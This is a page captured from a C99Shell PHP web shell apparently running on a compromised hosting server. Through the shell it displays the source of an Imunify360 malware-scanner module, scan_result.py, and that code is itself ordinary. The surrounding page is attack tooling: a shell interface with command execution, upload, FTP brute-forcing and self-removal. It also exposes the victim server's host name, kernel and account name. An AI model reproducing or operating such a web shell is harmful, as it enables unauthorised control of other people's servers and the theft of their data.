!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/opt/imunify360/venv/lib/python3.11/site-packages/imav/malwarelib/scan/   drwxr-xr-x
Free 294.55 GB of 429.69 GB (68.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     scan_result.py (9.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"""
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License,
or (at your option) any later version.


This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License for more details.


You should have received a copy of the GNU General Public License
 along with this program.  If not, see <https://www.gnu.org/licenses/>.

Copyright © 2019 Cloud Linux Software Inc.

This software is also available under ImunifyAV commercial license,
see <https://www.imunify360.com/legal/eula>
"""
import asyncio
import logging
import time
from concurrent.futures.thread import ThreadPoolExecutor
from functools import wraps
from tempfile import NamedTemporaryFile
from typing import Any, Dict
from uuid import uuid4

from defence360agent.contracts.hook_events import HookEvent
from defence360agent.subsys.panels import hosting_panel
from defence360agent.utils import encode_filename
from imav.contracts.config import Malware
from imav.malwarelib.config import MalwareScanType
from imav.malwarelib.utils.user_list import fill_results_owner

logger = logging.getLogger(__name__)

_executor = ThreadPoolExecutor(max_workers=1)

SCAN_OPTIONS = [
    "intensity_cpu",
    "intensity_io",
    "intensity_ram",
    "detect_elf",
    "use_filters",
]

DIRECT_SCAN_OPTIONS = [
    *SCAN_OPTIONS,
    "follow_symlinks",
    "exclude_patterns",
    "file_patterns",
]

SCAN_HOOK_PARAMS = [
    "file_patterns",
    "follow_symlinks",
    "exclude_patterns",
    "intensity_cpu",
    "intensity_io",
    "intensity_ram",
]


class ScanResult:
    def __init__(self, path, scan_id, scan_type):
        self.scans = []
        self.total_files = 0
        self.error = None
        self.errors = []

        self._begin_time = self._end_time = None
        self._aggregated_results = {}

        self._path = path
        self._scan_id = scan_id
        self._scan_type = scan_type
        self.args = None

    def is_detached(self):
        return self._scan_type in (
            MalwareScanType.BACKGROUND,
            MalwareScanType.ON_DEMAND,
            MalwareScanType.USER,
        )

    def set_start_stop(self, begin_time=None, end_time=None):
        if begin_time:
            self._begin_time = begin_time
        if end_time:
            self._end_time = end_time

    def to_dict_initial(self):
        result = {
            "summary": {
                "scanid": self._scan_id,
                "type": self._scan_type,
                "path": self._path,
                "started": self._begin_time,
                "completed": self._end_time,
                "total_files": self.total_files,
                "error": self.error,
                "errors": self.errors,
            },
            # We need to provide empty (not null) result to 'complete_scan'
            # in case of scan without files
            "results": None if self.is_detached() else {},
        }
        # Do not include args if they are not applicable
        if self.args:
            result["summary"]["args"] = self.args
        return result

    def to_dict(self):
        as_dict = self.to_dict_initial()
        as_dict["results"] = self.scans
        return as_dict

    def _aggregate_result(self):
        self.scans = aggregate_result(list(*self.scans))
        return self

    async def get(self):
        self._aggregate_result()
        await fill_results_owner(self.scans)
        return self


def aggregate_result(scans):
    aggregated_results: Dict[str, Any] = {}

    for record in scans:
        matches = {
            "matches": record["signature"],
            "suspicious": record["suspicious"],
            "extended_suspicious": record.get("extended_suspicious", False),
            "timestamp": record["timestamp"],
        }
        if record.get("ignore"):
            logger.info(
                "File match for %s will be ignored: %s",
                record["file_name"],
                matches,
            )
            continue

        row = aggregated_results.setdefault(
            record["file_name"],
            {
                "hits": [],
                "size": record["size"],
                "hash": record["hash"],
                "ctime": record.get("ctime", 0),
                "modification_time": record.get("modification_time", 0),
            },
        )

        if record.get("curable"):
            matches["curable"] = True

        # The first - non suspicious matches, suspicious - the second
        if record["suspicious"]:
            row["hits"].append(matches)
        else:
            row["hits"].insert(0, matches)

    return aggregated_results


def event_hook(sink):
    def _extract_scan_hook_params(kwargs):
        return {opt: kwargs[opt] for opt in kwargs if opt in SCAN_HOOK_PARAMS}

    def wrap(f):
        @wraps(f)
        async def wrapper(
            path, scan_id=None, scan_type=None, started=None, **kwargs
        ):
            scan_id = scan_id or uuid4().hex
            started = started or time.time()
            scan_params = _extract_scan_hook_params(kwargs)

            if scan_type:
                scan_started_event = HookEvent.MalwareScanningStarted(
                    scan_id=scan_id,
                    scan_type=scan_type,
                    path=path,
                    started=started,
                    scan_params=scan_params,
                )
                await sink.process_message(scan_started_event)

            _started = time.time()
            try:
                scan_result = await f(
                    path, scan_id=scan_id, scan_type=scan_type, **kwargs
                )
            except asyncio.CancelledError:
                raise
            except Exception as e:
                logger.exception("Scan wrapper task failed")
                scan_result = {
                    "summary": {
                        "scanid": scan_id,
                        "type": scan_type,
                        "path": path,
                        "total_files": 0,
                        "started": _started,
                        "completed": time.time(),
                        "error": repr(e),
                    },
                    "results": {},
                }

            return scan_result

        return wrapper

    return wrap


class DirectAiBolit:
    def __init__(self, *_, **__):
        pass

    @staticmethod
    async def _add_db_dir(home_dir, scan_options):
        if Malware.RAPID_SCAN:
            d = hosting_panel.HostingPanel().get_rapid_scan_db_dir(home_dir)
            scan_options["db_dir"] = d

    @staticmethod
    def _extract_scan_options(kwargs):
        return {
            opt: kwargs[opt] for opt in kwargs if opt in DIRECT_SCAN_OPTIONS
        }

    @staticmethod
    def _update_scan_options(kwargs):
        if (
            "exclude_patterns" in kwargs
            and kwargs["exclude_patterns"] is not None
        ):
            kwargs["exclude_patterns"] = ",".join(kwargs["exclude_patterns"])
        if "file_patterns" in kwargs and kwargs["file_patterns"] is not None:
            kwargs["file_patterns"] = ",".join(kwargs["file_patterns"])
        return kwargs

    def __call__(self, f):
        @wraps(f)
        async def wrapper(
            path, scan_id=None, scan_type=None, begin_time=None, **kwargs
        ):
            scan_options = self._update_scan_options(
                self._extract_scan_options(kwargs)
            )
            if scan_type in (MalwareScanType.USER, MalwareScanType.BACKGROUND):
                await self._add_db_dir(path, scan_options)
            scan_result = ScanResult(path, scan_id, scan_type)
            scan_result.set_start_stop(begin_time=begin_time)

            scan_result.scans, scan_result.error = await f(
                None,
                scan_type=scan_type,
                scan_id=scan_id,
                scan_path=path,
                **scan_options,
            )
            scan_result.scans = list(*scan_result.scans)
            return scan_result

        return wrapper


class PrepareFileList:
    def __init__(self, tmpdir):
        self._tmpdir = tmpdir

    async def prepare_file(self, fname, files, **kwargs) -> int:
        total_files = self._write_list_to_file(fname, files)
        return total_files

    @staticmethod
    def _write_list_to_file(fname, files):
        with open(fname, "wb") as f:
            total_files = 0
            for file in files:
                total_files += 1
                f.write(encode_filename(file))
            return total_files

    @staticmethod
    def _extract_scan_options(kwargs):
        return {opt: kwargs[opt] for opt in kwargs if opt in SCAN_OPTIONS}

    def __call__(self, f):
        @wraps(f)
        async def wrapper(
            path, scan_id=None, scan_type=None, begin_time=None, **kwargs
        ):
            scan_options = self._extract_scan_options(kwargs)
            scan_result = ScanResult(path, scan_id, scan_type)
            scan_result.set_start_stop(begin_time=begin_time)

            with NamedTemporaryFile(dir=self._tmpdir) as tf:
                total_files = await self.prepare_file(tf.name, path, **kwargs)
                scan_result.scans, scan_result.error = await f(
                    tf, scan_type=scan_type, scan_id=scan_id, **scan_options
                )
            scan_result.total_files = total_files
            scan_result.scans = list(*scan_result.scans)
            return scan_result

        return wrapper

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0977 ]--